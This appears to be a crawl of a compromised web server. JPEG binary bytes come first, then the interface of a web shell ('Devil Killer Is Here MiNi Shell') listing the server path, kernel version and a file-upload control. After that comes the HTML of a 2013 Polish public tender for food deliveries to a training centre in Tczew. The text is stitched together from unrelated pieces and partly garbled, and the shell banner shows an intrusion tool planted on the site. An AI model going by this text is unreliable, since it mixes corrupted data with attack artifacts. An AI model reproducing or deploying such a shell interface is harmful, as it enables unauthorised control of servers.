JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131009/411016-N-2013.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie w 2014 r.</b><br>
<b>Numer ogłoszenia: 411016 - 2013; data zamieszczenia: 09.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pomorska.ohp.pl/ http://www.pomorskie.eu/pl/bip/ohp</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie w 2014 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	UWAGA WAŻNE !!! Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
2.	UWAGA WAŻNE !!! Pełnomocnictwo do reprezentowania wykonawcy musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie).
3.	UWAGA WAŻNE !!! Niedopuszczalne jest zmienianie asortymentu w formularzach cenowych np. wpisywanie asortymentów o innej gramaturze, innej ilości,  itp. 
Dokonanie wszelkich zmian  w formularzach cenowych będzie skutkowało odrzuceniem oferty wykonawcy na podstawie art. 89 ust 1 pkt. 2 uPzP. 
4.	Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie od 1 stycznia 2014 r. do dnia 31 grudnia 2014 roku do: Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10. 
5.	Przedmiot zamówienia podzielono na 27 zadań częściowych:
Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - jaja
Zadanie nr 7 - mięso i produkty mięsne 
Zadanie nr 8 - ryby i przetwory konserwowe 
Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 10 - produkty skrobi - mąka  
Zadanie nr 11 - różne produkty spożywcze 
Zadanie nr 12- oleje i tłuszcze roślinne 
Zadanie nr 13 - produkty mleczarskie  
Zadanie nr 14 - napoje 
Zadanie nr 15 - cukiernicze produkty 
Zadanie nr 16 - owoce świeże   
Zadanie nr 17 - owoce przetworzone  
Zadanie nr 18 - warzywa świeże
Zadanie nr 19 - warzywa przetworzone
Zadanie nr 20 - jaja
Zadanie nr 21 - mięso i produkty mięsne 
Zadanie nr 22 - ryby i przetwory konserwowe 
Zadanie nr 23 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 24 - produkty skrobi - mąka  
Zadanie nr 25 - różne produkty spożywcze 
Zadanie nr 26- oleje i tłuszcze roślinne 
Zadanie nr 27 - produkty mleczarskie  
-Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10 (dokładne miejsce na terenie OSiW Tczew wskazane będzie przez Zamawiającego po podpisaniu umowy).
-Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
-Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). -Cykliczne dostawy  będą realizowane jak następuje:  
-Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
-Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
-Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument.
-Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
-Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
-Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia      zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
-W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
-Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
-Do składania zamówień Zamawiający upoważni wybranego pracownika.
-Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
-W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
-Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno/eksploatacyjno/użytkowych nie gorszych niż te, podane pod pojęciem typu. 
-Wykonawca ma obowiązek wystawiać faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego.  
-Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości poszczególnych rodzajów artykułów żywnościowych w stosunku do podanych w formularzu cenowym. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 90 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 10 % wartości zamówienia.
-Wartość brutto w formularzach cenowych należy wyliczać według wzoru:
ilość x cena netto + kwota VAT..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.89.80.00-9, 15.43.00.00-1, 03.21.00.00-6, 15.41.00.00-4, 15.13.10.00-5, 15.33.11.70-9, 03.22.00.00-9, 15.33.24.10-1, 15.22.00.00-6, 15.86.00.00-4, 15.87.00.00-7, 15.81.00.00-9, 15.00.00.00-8, 15.80.00.00-6, 15.13.11.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 27.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU.
12.1	W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp należy:
-złożyć oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust.1 Pzp, wg wzoru na załączniku  do SIWZ. 
-wykonawca, wraz z ofertą, składa listę podmiotów należących do tej samej grupy  kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 uPzP , tj. w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. Nr 50, poz. 331 z późn. zm.).   albo informację o tym, że nie należy do grupy kapitałowej.
12.2	W celu potwierdzenia spełniania warunków udziału w postępowaniu, o którym mowa  w art. 22 ust. 1 ustawy Pzp, do oferty należy dołączyć:
-oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp, w związku z art. 44 ustawy Pzp, wzór oświadczenia stanowi załączniku do SIWZ.
12.3	Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, będzie polegał na wiedzy i doświadczeniu i/lub na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b) ustawy Pzp., niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu: pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnej wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia (w formie oryginału).
12.4	W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust.1 pkt 1-4 PzP składa przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy złożą oświadczenia lub wspólne oświadczenie, że łącznie spełniają te warunki.
12.5	Ocena spełniania przedstawionych powyżej warunków zostanie dokonana na podstawie przedłożonych oświadczeń i dokumentów według formuły spełnia -nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.
12.6	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
-Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia - art. 23 ust. 1 ustawy Pzp. W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.
-Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich                   w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i dlatego też zobowiązane są dołączyć do oferty - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia, albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
-Wykonawcy, o których mowa w punkcie 1 składają jedną ofertę, przy czym:
-Oświadczenie Wykonawcy o braku podstaw do wykluczenia) każdy z Wykonawców składa oddzielnie w formie oryginału i podpisuje we własnym imieniu. Dopuszcza się możliwość złożenia na jednym formularzu, w którym będą znajdować się podpisy umocowanych osób wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu) Wykonawcy składają w formie oryginału i mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie), lub każdy z nich na osobnym dokumencie.
UWAGA: Do podmiotów wspólnie ubiegających się o zamówienie publiczne stosuje się te same przepisy co do pojedynczego wykonawcy. Odpowiednie ich stosowanie oznacza, że każdy uczestnik wspólnej oferty musi posiadać uprawnienia do wykonywania określonej działalności lub czynności i nie może podlegać wykluczeniu z postępowania. Natomiast przy ocenie spełniania warunków, brany jest pod uwagę łączny potencjał techniczny i kadrowy wykonawców (członków konsorcjum, członków spółki cywilnej) ich łączne kwalifikacje i doświadczenie oraz łączną sytuację ekonomiczną i finansową.
-Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przyjąć formę prawną konsorcjum zawiązanego w drodze umowy cywilnej. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowne porozumienie zawierające w swojej treści następujące postanowienia:
-określenie zasad reprezentacji i odpowiedzialności w sposób czytelny, nie budzący żadnej wątpliwości;
-określenie celu gospodarczego;
-oznaczenie czasu trwania konsorcjum obejmującego okres realizacji  przedmiotu zamówienia i okres gwarancji;
-wykluczenie możliwości wypowiedzenia umowy przez któregokolwiek z jej członków do czasu wykonania zamówienia bez zgody Zamawiającego i upływu  okresu gwarancji;
-zakaz dokonywania zmian w umowie bez zgody Zamawiającego.
-Ocena spełnienia przedstawionych powyżej warunków zostanie dokonana na podstawie przedłożonych oświadczeń i dokumentów wg formuły spełnia/nie spełnia w oparciu o informacje zawarte w oświadczeniach wyszczególnionych w pkt. 12 niniejszej SIWZ.  Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.
-Wykonawcy, występujący wspólnie składają jedną ofertę, przy czym:
-Załącznik do SIWZ (Oświadczenie Wykonawcy o braku podstaw do wykluczenia) każdy z Wykonawców składa oddzielnie w formie oryginału i podpisuje we własnym imieniu. Dopuszcza się możliwość złożenia na jednym formularzu, w którym będą znajdować się podpisy umocowanych osób wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-Załącznik do SIWZ (Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu) Wykonawcy składają w formie oryginału i mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie), lub każdy z nich na osobnym dokumencie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
-Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
-Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
-W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. Stawki ZUS. W przypadku zmiany obowiązującej stawki podatku VAT, stawki ZUS Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT lub ZUS. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT, stawki ZUS jeszcze nie dokonano.
-Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
-Zmiany powszechnie obowiązujących  przepisów  prawa  w  zakresie  mającym wpływ na realizację umowy.  
-W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorska.ohp.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 610, VI piętro. 
ul. Uphagena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2013 godzina 08:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
(sekretariat pokój 605) 6 piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> arbuz	kg	100
banany	kg	150
brzoskwinie	kg	80
cytryny	kg	30
gruszki	kg	60
jabłka	kg	300
kiwi	kg	11
kiwi	szt	92
maliny	kg	8
maliny 500g	szt	8
mandarynki	kg	80
nektaryny	kg	50
pomarancza	kg	60
śliwki	kg	20
truskawki	kg	30
winogrona	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany565g	szt	48
brzoskwinie kons.820g	szt	30
Dżem  270g	szt	100
Dżem 7 kg	szt	10
kompot wiśniowy 0,9 l	szt	50
rodzynki suszone 100g	szt	20
sok owocowy 1l (różne smaki-pomarańcz, gruszka, wiśnia, grejfrut,mix itp.)	szt	45
sok owocowy 2l (różne smaki-pomarańcz, grejfrut, jabłkowy, cz.pożeczka, mixitp)	szt	30
sok typu owocowy, warzywno -owocowe (marchew-trusk-banan, marchew-malina-banan, marchew-jabł-banan itp.) 220ml	szt	185
syrop owocowy 1l	szt	20
syrop owocowy 4,96l	szt	43.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuł	szt	35
burak	kg	250
burak młody - botwina	szt	50
cebula	kg	350
cebula czerwona 	kg	5
czosnek	szt	25
fasola drobna 	kg	25
fasola jaś	kg	25
fasola szparagowa	kg	15
groch łuska 0,5kg	szt	40
kalafior	szt	65
kapusta 	kg	200
kapusta czerwona	kg	20
kapusta młoda 	szt	50
kapusta pekińska	kg	80
kapusta pekińska	szt	40
